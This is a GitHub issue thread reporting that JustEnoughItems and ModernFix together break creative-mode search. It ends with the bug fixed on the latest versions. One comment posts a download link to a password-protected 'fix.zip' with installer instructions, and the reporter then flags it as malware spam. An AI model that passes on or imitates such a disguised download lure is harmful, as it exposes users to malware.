### ISSUE TITLE
[Bug]: Incompatibility with ModernFix causes creative mode search tab to return no results

### ISSUE THREAD

**Issue by CenTdemeern1** [mezz/JustEnoughItems#3710]
### Steps to Reproduce the Bug

1. Install JEI and ModernFix (FerriteCore not required)
2. Try searching anything in the creative mode search tab

### Expected Behavior

The search should return results (assuming you searched for something that exists)

### Actual Behavior

No results are returned

### latest.log

https://gist.github.com/CenTdemeern1/544489d1757bd9961afac32730adee22

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CenTdemeern1** [comment]
~~The above comment is spam (malware). Ignore it. GitHub is going through a malware spam flood right now.~~
Edit: the spammer's account has been deleted!

**Comment by GLMaster19** [comment]
Try to download new ModernFix version. It works for me.

**Comment by CenTdemeern1** [comment]
It seems to be fixed on the latest version of both mods available for 1.20.1 Forge, hooray! (But not on NeoForge though...)
Closing the issue.
